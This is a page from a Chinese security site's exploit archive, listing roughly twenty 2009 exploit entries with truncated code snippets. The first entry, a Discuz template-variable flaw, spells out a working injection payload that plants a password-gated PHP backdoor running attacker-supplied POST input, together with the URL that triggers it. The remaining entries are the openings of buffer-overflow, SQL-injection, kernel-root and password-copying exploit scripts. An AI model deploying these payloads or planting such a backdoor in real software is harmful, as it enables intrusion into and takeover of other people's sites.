首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
Discuz自定义模板变量漏洞
  日期:2009-08-21 15:04:09 点击:97 评论:0
自定义模板变量: 变 量 : {','');ECHO '';$X=SUBSTR(MD5($_GET['B']),28);IF($X=='7aaa')($_POST['A']);//} 替换内容 : aaaaaaaaaa 然后链接 http://www.site.com/forumdata/cache/usergroup_0.php 程序代码: ?php (substr(md5($_POST['b']),28)=='7aaa') ($_POST['a']
Linux Kernel 2.x sock_sendpage() Local Root Exploit (Android Edition)
  日期:2009-08-19 10:43:52 点击:596 评论:0
1* Source for exploiting CVE-2009-2692 on Android; Hole is closed in Android kernels released August 2009 or later. orig: http://zenthought.org/content/file/android-root-2009-08-16-source back: http://milw0rm.com/sploits/android-root-20090816.tar.gz
VUPlayer <= 2.49 (.m3u File) Universal Buffer Overflow Exploit
  日期:2009-08-19 10:43:09 点击:34 评论:0
#!/usr/bin/env python # # VUPlayer =2.49 .M3u Universal buffer overflow exploit # Author: mr_me # Download: http://vuplayer.com/ # Tested on Wind0ws XP SP3 and Vist@ # # Thanks to my brother raWjaW --- RESPECT! :) # # What do we see at crash time? ;
Traidnt UP 2.0 Remote SQL Injection Exploit
  日期:2009-08-19 10:42:17 点击:41 评论:0
#!/usr/bin/ruby #=============================================# # Traidnt UP v2.0 Exploit # # SQL Injection Vulnerability # #---------------------------------------------# # Date: 05-08-2009 # # Discovered written by: Jafer Al-Zidjali # # Email: jaf
ProSysInfo TFTP Server TFTPDWIN 0.4.2 Remote BOF Exploit
  日期:2009-08-19 10:40:22 点击:52 评论:0
#!/usr/bin/python #ProSysInfo TFTP Server TFTPDWIN 0.4.2 #Coded by Wraith import os import sys import struct import socket import time print nProSysInfo TFTP Server TFTPDWIN 0.4.2 print Note: This vuln is sensitive to different buffer lengthn if l
KOL Player 1.0 (.mp3 File) Local Buffer Overflow PoC
  日期:2009-08-19 10:39:33 点击:47 评论:0
#!/usr/bin/perl # KOL Player 1.0 (.mp3) Local Buffer Overflow PoC # http://thaddy.co.uk/kolacmwaveplayer.zip ######################################################################################## # 0012F920 |00168370 ASCII AAAA # 0012F924 |41410004
Playlistmaker 1.51 (.m3u File) Local Buffer Overflow Exploit (SEH)
  日期:2009-08-19 10:38:40 点击:23 评论:0
# Playlistmaker version 1.51 # Tested on Windows XP SP2 (English) # Exploit originally discovered by ThE g0bL!N/exploited by germaya_x # I could not get germaya_x's exploit to work with XP3. # The only useable p/p/r I could find was in oledlg.dll #
Joomla Component MisterEstate Blind SQL Injection Exploit
  日期:2009-08-19 10:37:26 点击:25 评论:0
?php echo 'h2Joomla Component MisterEstate Blind SQL Injection Exploit/h2'; // http://www.misterestate.com/ ini_set( memory_limit, 512M ); ini_set( max_execution_time, 0 ); set_time_limit( 0 ); if( !isset( $_GET['url'] ) ) die( 'Usage: '.$_SERVER['S
Xenorate Media Player 2.6.0.0 (.xpl) Universal Local Buffer Exploit (SEH)
  日期:2009-08-19 10:36:51 点击:30 评论:0
#!/usr/bin/perl # by hack4love # hack4love@hotmail.com # Xenorate Media Player 2.6.0.0(.xpl)Universal Local Buffer Exploit (SEH) # http://www.softpedia.com/progDownload/Xenorate-Download-71701.html ####################################################
broid 1.0 Beta 3a (.mp3 File) Local Buffer Overflow PoC
  日期:2009-08-19 10:36:17 点击:34 评论:0
#!/usr/bin/perl # Found By :: HACK4LOVE # broid 1.0 Beta 3a (.mp3 File) Local Stack Overflow PoC # http://s1.freedownloadsplace.com/download-soft1/broid-1.0-Beta-3a.zip #################################################################################
MS Internet Explorer (Javascript SetAttribute) Remote Crash Exploit
  日期:2009-08-19 10:34:47 点击:44 评论:0
html head title Irfan Asrar/title /head body onload=c() Set Attribute Crash : Tested with IE7 Vista IE6 XP2 IE6 XP3 script type=text/javascript function c() { var li = document.createElement(li); li.setAttribute(value, 1); li.value = 1; } /script /b
Arcadem Pro 2.8 (article) Blind SQL Injection Exploit
  日期:2009-08-19 10:33:58 点击:69 评论:0
#!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print n; print ################## VIVA ISLAME VIVA ISLAME ####################n; print ################## VIVA ISLAME VIVA ISLAME ####################n; print ## ##n; print ##
TheGreenBow VPN Client tgbvpn.sys Local DoS Exploit
  日期:2009-08-19 10:32:56 点击:25 评论:0
Author: Giuseppe 'Evilcry' Bonfa' E-Mail: evilcry {AT} GMAIL {DOT} COM Website: http://evilcry.netsons.org http://evilcodecave.blogspot.com http://evilcodecave.wordpress.com http://evilfingers.com http://malwareAnalytics.com [under construction] Rel
SPIP < 2.0.9 Arbitrary Copy All Passwords to XML File Remote Exploit
  日期:2009-08-19 10:32:21 点击:140 评论:0
#!/usr/bin/env python # SPIP - Content Management System 2.0.9 exploit # http://www.securityfocus.com/bid/36008 # Author : Kernel_Panik # import urllib, urllib2 import cookielib import sys def send_request(urlOpener, url, post_data=None): request =
AJ Auction Pro OOPD 2.x (store.php id) SQL Injection Exploit
  日期:2009-08-19 10:31:24 点击:94 评论:0
#!/usr/bin/perl #********************************************************# # # # [o] AJ Auction Pro OOPD 2.x SQL Injection Exploit # # Software : AJ Auction Pro OOPD 2.x # # Vendor : http://www.ajsquare.com/ # # Author : NoGe # # Contact : noge[dot]
HTML Email Creator & Sender 2.3 Local Buffer Overflow PoC (SEH)
  日期:2009-08-19 10:30:25 点击:60 评论:0
/*0day HTML Email Creator Sender v2.3 Local Buffer Overflow(Seh) Poc ******************************************************************** Debugging info Seh handler is overwriten , the offset is at 60 bytes in our buffer so you have to build your bu
BaBB 2.8 Remote Code Injection Exploit
  日期:2009-08-19 10:29:22 点击:50 评论:0
#!usr/bin/python ##################################################################################### #### BaBB 2.8 Full Code Injection Exploit #### ##################################################################################### # # #AUTHOR :
Linux Kernel < 2.6.30.5 cfg80211 Remote Denial of Service Exploit
  日期:2009-08-19 10:28:42 点击:145 评论:0
/* * cfg80211-remote-dos.c * * Linux Kernel 2.6.30.5 cfg80211 Remote DoS * Jon Oberheide jon@oberheide.org * http://jon.oberheide.org * * Information: * * http://patchwork.kernel.org/patch/41218/ * * These pointers can be NULL, the is_mesh() case is
TheGreenBow VPN client versions 4.61.003 suffers from a local denial of service
  日期:2009-08-18 09:53:15 点击:38 评论:0
Original Advisory Link: https://www.evilfingers.com/advisory/Advisory/TheGreenBow_VPN_Client_tgbvpn.sys_DoS.php ++++++++++++++++++++++++++++++++++++++++++++++++++++-----------[TheGreenBow VPN Client tgbvpn.sys DoS and Potential LocalPrivilege Escala
Easy Music Player version 1.0.0.2 .wav file universal local buffer overflow expl
  日期:2009-08-18 09:51:37 点击:46 评论:0
#!/usr/bin/perl# Ostoure sazan sharif# Home: www.ostoure.com# Easy Music Player 1.0.0.2 (wav) Universal Local Buffer Exploit (SEH)# http://www.otbcode.com/downloads/easymusicsetup.exe++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
共637页/12733条记录 首页 上一页 [430] [431] [432] 433 [434] [435] [436] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved